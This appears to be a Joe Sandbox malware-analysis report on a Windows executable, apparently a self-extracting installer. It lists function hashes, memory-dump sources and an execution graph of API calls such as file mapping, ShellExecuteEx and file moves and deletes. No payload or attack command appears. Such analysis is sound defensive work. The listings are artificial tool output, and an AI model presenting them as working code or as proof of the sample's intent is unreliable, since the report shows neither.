                                                                                                                                                                                                              • Opcode ID: 3a0a1b33bafb837ef3869f84af2ef01071847174f9741cab1fec32c2d88c2b25
                                                                                                                                                                                                              • Instruction ID: 5d0ab28f8786af58de011523463f9ac90deae6f7dc05753c1e04cae2dd7582b6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a0a1b33bafb837ef3869f84af2ef01071847174f9741cab1fec32c2d88c2b25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E21C763A19743A9EE15FB51A580378B290EF04FE4F985630DE6D077D2DE3CA492A310
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 203985260-0
                                                                                                                                                                                                              • Opcode ID: 06307606f78a99aaedfa9dc91252f3d2ccca91acf1828ac2f8e73b894af3cb05
                                                                                                                                                                                                              • Instruction ID: ecff2294ea9b3ae1233a224b42f2f6fa9a4a1e2b79dae31cf255a08bb2058fd2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06307606f78a99aaedfa9dc91252f3d2ccca91acf1828ac2f8e73b894af3cb05
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53215172A29B8687E714DF11E48432EB6B4FB98F84F644138DB8957B58DF3DD8418B10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __acrt_iob_func__stdio_common_vfprintffclosefflushfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2759974054-0
                                                                                                                                                                                                              • Opcode ID: d4b4f765204421fc5023d21932fe76617ef4cf60d1a6fa8fef69ac652b5a7f36
                                                                                                                                                                                                              • Instruction ID: 2de89cd2b15eec1c042bf259836c254b467cc04522ef885a4e32e4fa4c4f0624
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4b4f765204421fc5023d21932fe76617ef4cf60d1a6fa8fef69ac652b5a7f36
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3121363691AA83B1EB55BF10D9D42B8A3A5FF54FC4F894036CE5D8B254DF2C9881A370
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Xlength_error@std@@__std_exception_copy
                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                              • API String ID: 127952674-2556327735
                                                                                                                                                                                                              • Opcode ID: 89d7d8f452b379fe6b6802d6f556719cdd5f33c5e524f226374701c1ed2583e1
                                                                                                                                                                                                              • Instruction ID: 1fb6340fa2c6a233aec9be385d86828d35c948abc7d61de7e939b10c4a904df8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89d7d8f452b379fe6b6802d6f556719cdd5f33c5e524f226374701c1ed2583e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7E0E561A54B46E1EF05AF61E8900A8B375EB58F54BC49131C95D4A324EF3CE2E9D314
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: freemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3061335427-0
                                                                                                                                                                                                              • Opcode ID: b3eb811457c7a1482b9a2b945b6ffa28c0ffbb9270caf0cd92ca5b9d91cc925a
                                                                                                                                                                                                              • Instruction ID: 6e3e3087151825f114a937b47ef8e35992964d51ca0cdea15c1f9932b13118b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3eb811457c7a1482b9a2b945b6ffa28c0ffbb9270caf0cd92ca5b9d91cc925a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FB1E722E24BC5A6E711DB35948427EF7B4FF99B84F048332EE8652664DB3CE442D710
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$freemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1763039611-0
                                                                                                                                                                                                              • Opcode ID: 4612718c5eb21b574697e27893dc7b7a5a698bd1bfdf0afee39cc7be2cde016e
                                                                                                                                                                                                              • Instruction ID: 55d5fd5dce59188614ebb716657aed120d569edde7fa387d641b404531fa23db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4612718c5eb21b574697e27893dc7b7a5a698bd1bfdf0afee39cc7be2cde016e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC31D472715A82A6EE18DF09E5801A8A3A1FB48F81B888436DF5D87B51DF3CE591D700

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:9.3%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:4.2%
                                                                                                                                                                                                              Total number of Nodes:1468
                                                                                                                                                                                                              Total number of Limit Nodes:45
                                                                                                                                                                                                              execution_graph 25313 e0bee0 GetCommandLineA GetCommandLineW 23621 dfe2d7 23622 dfe1db 23621->23622 23624 dfe85d 23622->23624 23650 dfe5bb 23624->23650 23626 dfe86d 23627 dfe8ca 23626->23627 23639 dfe8ee 23626->23639 23628 dfe7fb DloadReleaseSectionWriteAccess 6 API calls 23627->23628 23629 dfe8d5 RaiseException 23628->23629 23630 dfeac3 23629->23630 23630->23622 23631 dfe966 LoadLibraryExA 23632 dfe979 GetLastError 23631->23632 23633 dfe9c7 23631->23633 23635 dfe98c 23632->23635 23636 dfe9a2 23632->23636 23634 dfe9d2 FreeLibrary 23633->23634 23637 dfe9d9 23633->23637 23634->23637 23635->23633 23635->23636 23641 dfe7fb DloadReleaseSectionWriteAccess 6 API calls 23636->23641 23638 dfea37 GetProcAddress 23637->23638 23645 dfea95 23637->23645 23640 dfea47 GetLastError 23638->23640 23638->23645 23639->23631 23639->23633 23639->23637 23639->23645 23643 dfea5a 23640->23643 23642 dfe9ad RaiseException 23641->23642 23642->23630 23643->23645 23646 dfe7fb DloadReleaseSectionWriteAccess 6 API calls 23643->23646 23659 dfe7fb 23645->23659 23647 dfea7b RaiseException 23646->23647 23648 dfe5bb ___delayLoadHelper2@8 6 API calls 23647->23648 23649 dfea92 23648->23649 23649->23645 23651 dfe5ed 23650->23651 23652 dfe5c7 23650->23652 23651->23626 23667 dfe664 23652->23667 23654 dfe5cc 23655 dfe5e8 23654->23655 23670 dfe78d 23654->23670 23675 dfe5ee GetModuleHandleW GetProcAddress GetProcAddress 23655->23675 23658 dfe836 23658->23626 23660 dfe82f 23659->23660 23661 dfe80d 23659->23661 23660->23630 23662 dfe664 DloadReleaseSectionWriteAccess 3 API calls 23661->23662 23663 dfe812 23662->23663 23664 dfe82a 23663->23664 23666 dfe78d DloadProtectSection 3 API calls 23663->23666 23678 dfe831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23664->23678 23666->23664 23676 dfe5ee GetModuleHandleW GetProcAddress GetProcAddress 23667->23676 23669 dfe669 23669->23654 23671 dfe7a2 DloadProtectSection 23670->23671 23672 dfe7a8 23671->23672 23673 dfe7dd VirtualProtect 23671->23673 23677 dfe6a3 VirtualQuery GetSystemInfo 23671->23677 23672->23655 23673->23672 23675->23658 23676->23669 23677->23673 23678->23660 23680 de10d5 23685 de5abd 23680->23685 23686 de5ac7 __EH_prolog 23685->23686 23692 deb505 23686->23692 23688 de5ad3 23698 de5cac GetCurrentProcess GetProcessAffinityMask 23688->23698 23693 deb50f __EH_prolog 23692->23693 23699 def1d0 82 API calls 23693->23699 23695 deb521 23700 deb61e 23695->23700 23699->23695 23701 deb630 __cftof 23700->23701 23704 df10dc 23701->23704 23707 df109e GetCurrentProcess GetProcessAffinityMask 23704->23707 23708 deb597 23707->23708 23708->23688 25314 dff4d3 20 API calls 23709 dfe1d1 14 API calls ___delayLoadHelper2@8 23711 e098f0 23719 e0adaf 23711->23719 23715 e0990c 23716 e09919 23715->23716 23727 e09920 11 API calls 23715->23727 23718 e09904 23728 e0ac98 23719->23728 23722 e0adee TlsAlloc 23723 e0addf 23722->23723 23724 dffbbc CatchGuardHandler 5 API calls 23723->23724 23725 e098fa 23724->23725 23725->23718 23726 e09869 20 API calls 2 library calls 23725->23726 23726->23715 23727->23718 23729 e0acc4 23728->23729 23730 e0acc8 23728->23730 23729->23730 23733 e0ace8 23729->23733 23735 e0ad34 23729->23735 23730->23722 23730->23723 23732 e0acf4 GetProcAddress 23734 e0ad04 __dosmaperr 23732->23734 23733->23730 23733->23732 23734->23730 23736 e0ad55 LoadLibraryExW 23735->23736 23737 e0ad4a 23735->23737 23738 e0ad72 GetLastError 23736->23738 23740 e0ad8a 23736->23740 23737->23729 23738->23740 23741 e0ad7d LoadLibraryExW 23738->23741 23739 e0ada1 FreeLibrary 23739->23737 23740->23737 23740->23739 23741->23740 23742 e0abf0 23745 e0abfb 23742->23745 23744 e0ac24 23755 e0ac50 DeleteCriticalSection 23744->23755 23745->23744 23746 e0ac20 23745->23746 23748 e0af0a 23745->23748 23749 e0ac98 __dosmaperr 5 API calls 23748->23749 23750 e0af31 23749->23750 23751 e0af3a 23750->23751 23752 e0af4f InitializeCriticalSectionAndSpinCount 23750->23752 23753 dffbbc CatchGuardHandler 5 API calls 23751->23753 23752->23751 23754 e0af66 23753->23754 23754->23745 23755->23746 25315 e088f0 7 API calls ___scrt_uninitialize_crt 25318 df62ca 123 API calls __InternalCxxFrameHandler 25319 e02cfb 38 API calls 4 library calls 23764 dfdec2 23765 dfdecf 23764->23765 23772 dee617 23765->23772 23768 de4092 _swprintf 51 API calls 23769 dfdef1 SetDlgItemTextW 23768->23769 23776 dfb568 PeekMessageW 23769->23776 23773 dee627 23772->23773 23781 dee648 23773->23781 23777 dfb5bc 23776->23777 23778 dfb583 GetMessageW 23776->23778 23779 dfb599 IsDialogMessageW 23778->23779 23780 dfb5a8 TranslateMessage DispatchMessageW 23778->23780 23779->23777 23779->23780 23780->23777 23787 ded9b0 23781->23787 23784 dee66b LoadStringW 23785 dee645 23784->23785 23786 dee682 LoadStringW 23784->23786 23785->23768 23786->23785 23792 ded8ec 23787->23792 23789 ded9cd 23790 ded9e2 23789->23790 23800 ded9f0 26 API calls 23789->23800 23790->23784 23790->23785 23793 ded904 23792->23793 23799 ded984 _strncpy 23792->23799 23795 ded928 23793->23795 23801 df1da7 WideCharToMultiByte 23793->23801 23796 ded959 23795->23796 23802 dee5b1 50 API calls __vsnprintf 23795->23802 23803 e06159 26 API calls 3 library calls 23796->23803 23799->23789 23800->23790 23801->23795 23802->23796 23803->23799 25366 dfb5c0 100 API calls 25367 df77c0 118 API calls 25368 dfffc0 RaiseException _com_error::_com_error CallUnexpected 25321 de5ef0 82 API calls 25369 de95f0 80 API calls 25370 dffd4f 9 API calls 2 library calls 25372 e0a3d0 21 API calls 2 library calls 25373 e12bd0 VariantClear 25375 def1e8 FreeLibrary 23849 dfeae7 23850 dfeaf1 23849->23850 23851 dfe85d ___delayLoadHelper2@8 14 API calls 23850->23851 23852 dfeafe 23851->23852 25323 dff4e7 29 API calls _abort 25324 e00ada 51 API calls 2 library calls 23854 dfb7e0 23855 dfb7ea __EH_prolog 23854->23855 24022 de1316 23855->24022 23858 dfbf0f 24094 dfd69e 23858->24094 23859 dfb82a 23860 dfb841 23859->23860 23862 dfb89b 23859->23862 23863 dfb838 23859->23863 23865 dfb92e GetDlgItemTextW 23862->23865 23871 dfb8b1 23862->23871 23866 dfb83c 23863->23866 23867 dfb878 23863->23867 23865->23867 23870 dfb96b 23865->23870 23866->23860 23878 dee617 53 API calls 23866->23878 23867->23860 23875 dfb95f KiUserCallbackDispatcher 23867->23875 23868 dfbf2a SendMessageW 23869 dfbf38 23868->23869 23872 dfbf52 GetDlgItem SendMessageW 23869->23872 23873 dfbf41 SendDlgItemMessageW 23869->23873 23876 dfb980 GetDlgItem 23870->23876 23880 dfb974 23870->23880 23877 dee617 53 API calls 23871->23877 24112 dfa64d GetCurrentDirectoryW 23872->24112 23873->23872 23875->23860 23881 dfb9b7 SetFocus 23876->23881 23882 dfb994 SendMessageW SendMessageW 23876->23882 23883 dfb8ce SetDlgItemTextW 23877->23883 23884 dfb85b 23878->23884 23879 dfbf82 GetDlgItem 23885 dfbf9f 23879->23885 23886 dfbfa5 SetWindowTextW 23879->23886 23880->23867 23890 dfbe55 23880->23890 23887 dfb9c7 23881->23887 23897 dfb9e0 23881->23897 23882->23881 23888 dfb8d9 23883->23888 24134 de124f SHGetMalloc 23884->24134 23885->23886 24113 dfabab GetClassNameW 23886->24113 23892 dee617 53 API calls 23887->23892 23888->23860 23895 dfb8e6 GetMessageW 23888->23895 23893 dee617 53 API calls 23890->23893 23896 dfb9d1 23892->23896 23899 dfbe65 SetDlgItemTextW 23893->23899 23895->23860 23901 dfb8fd IsDialogMessageW 23895->23901 24135 dfd4d4 23896->24135 23906 dee617 53 API calls 23897->23906 23898 dfc1fc SetDlgItemTextW 23898->23860 23903 dfbe79 23899->23903 23901->23888 23905 dfb90c TranslateMessage DispatchMessageW 23901->23905 23908 dee617 53 API calls 23903->23908 23905->23888 23907 dfba17 23906->23907 23910 de4092 _swprintf 51 API calls 23907->23910 23944 dfbe9c _wcslen 23908->23944 23909 dfbff0 23913 dfc020 23909->23913 23916 dee617 53 API calls 23909->23916 23915 dfba29 23910->23915 23911 dfc73f 97 API calls 23911->23909 23912 dfb9d9 24032 dea0b1 23912->24032 23918 dfc73f 97 API calls 23913->23918 23962 dfc0d8 23913->23962 23920 dfd4d4 16 API calls 23915->23920 23921 dfc003 SetDlgItemTextW 23916->23921 23926 dfc03b 23918->23926 23919 dfc18b 23927 dfc19d 23919->23927 23928 dfc194 EnableWindow 23919->23928 23920->23912 23924 dee617 53 API calls 23921->23924 23922 dfba73 24038 dfac04 SetCurrentDirectoryW 23922->24038 23923 dfba68 GetLastError 23923->23922 23930 dfc017 SetDlgItemTextW 23924->23930 23937 dfc04d 23926->23937 23966 dfc072 23926->23966 23933 dfc1ba 23927->23933 24153 de12d3 GetDlgItem EnableWindow 23927->24153 23928->23927 23929 dfbeed 23932 dee617 53 API calls 23929->23932 23930->23913 23931 dfba87 23935 dfba9e 23931->23935 23936 dfba90 GetLastError 23931->23936 23932->23860 23934 dfc1e1 23933->23934 23950 dfc1d9 SendMessageW 23933->23950 23934->23860 23951 dee617 53 API calls 23934->23951 23941 dfbb11 23935->23941 23947 dfbb20 23935->23947 23952 dfbaae GetTickCount 23935->23952 23936->23935 24151 df9ed5 32 API calls 23937->24151 23938 dfc0cb 23940 dfc73f 97 API calls 23938->23940 23940->23962 23946 dfbd56 23941->23946 23941->23947 23943 dfc1b0 24154 de12d3 GetDlgItem EnableWindow 23943->24154 23944->23929 23945 dee617 53 API calls 23944->23945 23953 dfbed0 23945->23953 24054 de12f1 GetDlgItem ShowWindow 23946->24054 23954 dfbcfb 23947->23954 23956 dfbb39 GetModuleFileNameW 23947->23956 23957 dfbcf1 23947->23957 23948 dfc066 23948->23966 23950->23934 23959 dfb862 23951->23959 23960 de4092 _swprintf 51 API calls 23952->23960 23961 de4092 _swprintf 51 API calls 23953->23961 23965 dee617 53 API calls 23954->23965 23955 dfc169 24152 df9ed5 32 API calls 23955->24152 24145 def28c 82 API calls 23956->24145 23957->23867 23957->23954 23959->23860 23959->23898 23968 dfbac7 23960->23968 23961->23929 23962->23919 23962->23955 23969 dee617 53 API calls 23962->23969 23972 dfbd05 23965->23972 23966->23938 23973 dfc73f 97 API calls 23966->23973 23967 dfbd66 24055 de12f1 GetDlgItem ShowWindow 23967->24055 24039 de966e 23968->24039 23969->23962 23970 dfc188 23970->23919 23971 dfbb5f 23975 de4092 _swprintf 51 API calls 23971->23975 23976 de4092 _swprintf 51 API calls 23972->23976 23977 dfc0a0 23973->23977 23979 dfbb81 CreateFileMappingW 23975->23979 23980 dfbd23 23976->23980 23977->23938 23981 dfc0a9 DialogBoxParamW 23977->23981 23978 dfbd70 23982 dee617 53 API calls 23978->23982 23984 dfbbe3 GetCommandLineW 23979->23984 24017 dfbc60 __InternalCxxFrameHandler 23979->24017 23994 dee617 53 API calls 23980->23994 23981->23867 23981->23938 23985 dfbd7a SetDlgItemTextW 23982->23985 23989 dfbbf4 23984->23989 24056 de12f1 GetDlgItem ShowWindow 23985->24056 23986 dfbaed 23987 dfbaf4 GetLastError 23986->23987 23988 dfbaff 23986->23988 23987->23988 24047 de959a 23988->24047 24146 dfb425 SHGetMalloc 23989->24146 23990 dfbc6b ShellExecuteExW 24012 dfbc88 23990->24012 23997 dfbd3d 23994->23997 23995 dfbd8c SetDlgItemTextW GetDlgItem 23998 dfbda9 GetWindowLongW SetWindowLongW 23995->23998 23999 dfbdc1 23995->23999 23996 dfbc10 24147 dfb425 SHGetMalloc 23996->24147 23998->23999 24057 dfc73f 23999->24057 24003 dfbc1c 24148 dfb425 SHGetMalloc 24003->24148 24004 dfbccb 24004->23957 24010 dfbce1 UnmapViewOfFile CloseHandle 24004->24010 24005 dfc73f 97 API calls 24007 dfbddd 24005->24007 24082 dfda52 24007->24082 24008 dfbc28 24149 def3fa 82 API calls 2 library calls 24008->24149 24010->23957 24012->24004 24015 dfbcb7 Sleep 24012->24015 24014 dfbc3f MapViewOfFile 24014->24017 24015->24004 24015->24012 24016 dfc73f 97 API calls 24020 dfbe03 24016->24020 24017->23990 24018 dfbe2c 24150 de12d3 GetDlgItem EnableWindow 24018->24150 24020->24018 24021 dfc73f 97 API calls 24020->24021 24021->24018 24023 de131f 24022->24023 24024 de1378 24022->24024 24026 de1385 24023->24026 24155 dee2e8 62 API calls 2 library calls 24023->24155 24156 dee2c1 GetWindowLongW SetWindowLongW 24024->24156 24026->23858 24026->23859 24026->23860 24028 de1341 24028->24026 24029 de1354 GetDlgItem 24028->24029 24029->24026 24030 de1364 24029->24030 24030->24026 24031 de136a SetWindowTextW 24030->24031 24031->24026 24035 dea0bb 24032->24035 24033 dea14c 24034 dea2b2 8 API calls 24033->24034 24036 dea175 24033->24036 24034->24036 24035->24033 24035->24036 24157 dea2b2 24035->24157 24036->23922 24036->23923 24038->23931 24040 de9678 24039->24040 24041 de96d5 CreateFileW 24040->24041 24042 de96c9 24040->24042 24041->24042 24043 de971f 24042->24043 24044 debb03 GetCurrentDirectoryW 24042->24044 24043->23986 24045 de9704 24044->24045 24045->24043 24046 de9708 CreateFileW 24045->24046 24046->24043 24048 de95be 24047->24048 24053 de95cf 24047->24053 24049 de95ca 24048->24049 24050 de95d1 24048->24050 24048->24053 24178 de974e 24049->24178 24183 de9620 24050->24183 24053->23941 24054->23967 24055->23978 24056->23995 24058 dfc749 __EH_prolog 24057->24058 24059 dfbdcf 24058->24059 24060 dfb314 ExpandEnvironmentStringsW 24058->24060 24059->24005 24068 dfc780 _wcslen _wcsrchr 24060->24068 24062 dfb314 ExpandEnvironmentStringsW 24062->24068 24063 dfca67 SetWindowTextW 24063->24068 24066 e03e3e 22 API calls 24066->24068 24068->24059 24068->24062 24068->24063 24068->24066 24069 dfc855 SetFileAttributesW 24068->24069 24074 dfcc31 GetDlgItem SetWindowTextW SendMessageW 24068->24074 24078 dfcc71 SendMessageW 24068->24078 24198 df1fbb CompareStringW 24068->24198 24199 dfa64d GetCurrentDirectoryW 24068->24199 24201 dea5d1 6 API calls 24068->24201 24202 dea55a FindClose 24068->24202 24203 dfb48e 76 API calls 2 library calls 24068->24203 24071 dfc90f GetFileAttributesW 24069->24071 24076 dfc86f __cftof _wcslen 24069->24076 24071->24068 24073 dfc921 DeleteFileW 24071->24073 24073->24068 24075 dfc932 24073->24075 24074->24068 24077 de4092 _swprintf 51 API calls 24075->24077 24076->24068 24076->24071 24200 deb991 51 API calls 3 library calls 24076->24200 24079 dfc952 GetFileAttributesW 24077->24079 24078->24068 24079->24075 24080 dfc967 MoveFileW 24079->24080 24080->24068 24081 dfc97f MoveFileExW 24080->24081 24081->24068 24083 dfda5c __EH_prolog 24082->24083 24204 df0659 24083->24204 24085 dfda8d 24208 de5b3d 24085->24208 24087 dfdaab 24212 de7b0d 24087->24212 24091 dfdafe 24228 de7b9e 24091->24228 24093 dfbdee 24093->24016 24095 dfd6a8 24094->24095 24691 dfa5c6 24095->24691 24098 dfbf15 24098->23868 24098->23869 24099 dfd6b5 GetWindow 24099->24098 24100 dfd6d5 24099->24100 24100->24098 24101 dfd6e2 GetClassNameW 24100->24101 24103 dfd76a GetWindow 24100->24103 24104 dfd706 GetWindowLongW 24100->24104 24696 df1fbb CompareStringW 24101->24696 24103->24098 24103->24100 24104->24103 24105 dfd716 SendMessageW 24104->24105 24105->24103 24106 dfd72c GetObjectW 24105->24106 24697 dfa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24106->24697 24108 dfd743 24698 dfa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24108->24698 24699 dfa80c 8 API calls 24108->24699 24111 dfd754 SendMessageW DeleteObject 24111->24103 24112->23879 24114 dfabcc 24113->24114 24120 dfabf1 24113->24120 24702 df1fbb CompareStringW 24114->24702 24115 dfabff 24121 dfb093 24115->24121 24116 dfabf6 SHAutoComplete 24116->24115 24118 dfabdf 24119 dfabe3 FindWindowExW 24118->24119 24118->24120 24119->24120 24120->24115 24120->24116 24122 dfb09d __EH_prolog 24121->24122 24123 de13dc 84 API calls 24122->24123 24124 dfb0bf 24123->24124 24703 de1fdc 24124->24703 24127 dfb0eb 24130 de19af 128 API calls 24127->24130 24128 dfb0d9 24129 de1692 86 API calls 24128->24129 24131 dfb0e4 24129->24131 24133 dfb10d __InternalCxxFrameHandler ___std_exception_copy 24130->24133 24131->23909 24131->23911 24132 de1692 86 API calls 24132->24131 24133->24132 24134->23959 24136 dfb568 5 API calls 24135->24136 24137 dfd4e0 GetDlgItem 24136->24137 24138 dfd536 SendMessageW SendMessageW 24137->24138 24139 dfd502 24137->24139 24140 dfd572 24138->24140 24141 dfd591 SendMessageW SendMessageW SendMessageW 24138->24141 24144 dfd50d ShowWindow SendMessageW SendMessageW 24139->24144 24140->24141 24142 dfd5e7 SendMessageW 24141->24142 24143 dfd5c4 SendMessageW 24141->24143 24142->23912 24143->24142 24144->24138 24145->23971 24146->23996 24147->24003 24148->24008 24149->24014 24150->23880 24151->23948 24152->23970 24153->23943 24154->23933 24155->24028 24156->24026 24158 dea2bf 24157->24158 24159 dea2e3 24158->24159 24160 dea2d6 CreateDirectoryW 24158->24160 24161 dea231 3 API calls 24159->24161 24160->24159 24162 dea316 24160->24162 24163 dea2e9 24161->24163 24165 dea325 24162->24165 24170 dea4ed 24162->24170 24164 dea329 GetLastError 24163->24164 24166 debb03 GetCurrentDirectoryW 24163->24166 24164->24165 24165->24035 24168 dea2ff 24166->24168 24168->24164 24169 dea303 CreateDirectoryW 24168->24169 24169->24162 24169->24164 24171 dfec50 24170->24171 24172 dea4fa SetFileAttributesW 24171->24172 24173 dea53d 24172->24173 24174 dea510 24172->24174 24173->24165 24175 debb03 GetCurrentDirectoryW 24174->24175 24176 dea524 24175->24176 24176->24173 24177 dea528 SetFileAttributesW 24176->24177 24177->24173 24179 de9757 24178->24179 24180 de9781 24178->24180 24179->24180 24189 dea1e0 24179->24189 24180->24053 24184 de964a 24183->24184 24185 de962c 24183->24185 24186 de9669 24184->24186 24197 de6bd5 76 API calls 24184->24197 24185->24184 24187 de9638 CloseHandle 24185->24187 24186->24053 24187->24184 24190 dfec50 24189->24190 24191 dea1ed DeleteFileW 24190->24191 24192 de977f 24191->24192 24193 dea200 24191->24193 24192->24053 24194 debb03 GetCurrentDirectoryW 24193->24194 24195 dea214 24194->24195 24195->24192 24196 dea218 DeleteFileW 24195->24196 24196->24192 24197->24186 24198->24068 24199->24068 24200->24076 24201->24068 24202->24068 24203->24068 24205 df0666 _wcslen 24204->24205 24232 de17e9 24205->24232 24207 df067e 24207->24085 24209 df0659 _wcslen 24208->24209 24210 de17e9 78 API calls 24209->24210 24211 df067e 24210->24211 24211->24087 24213 de7b17 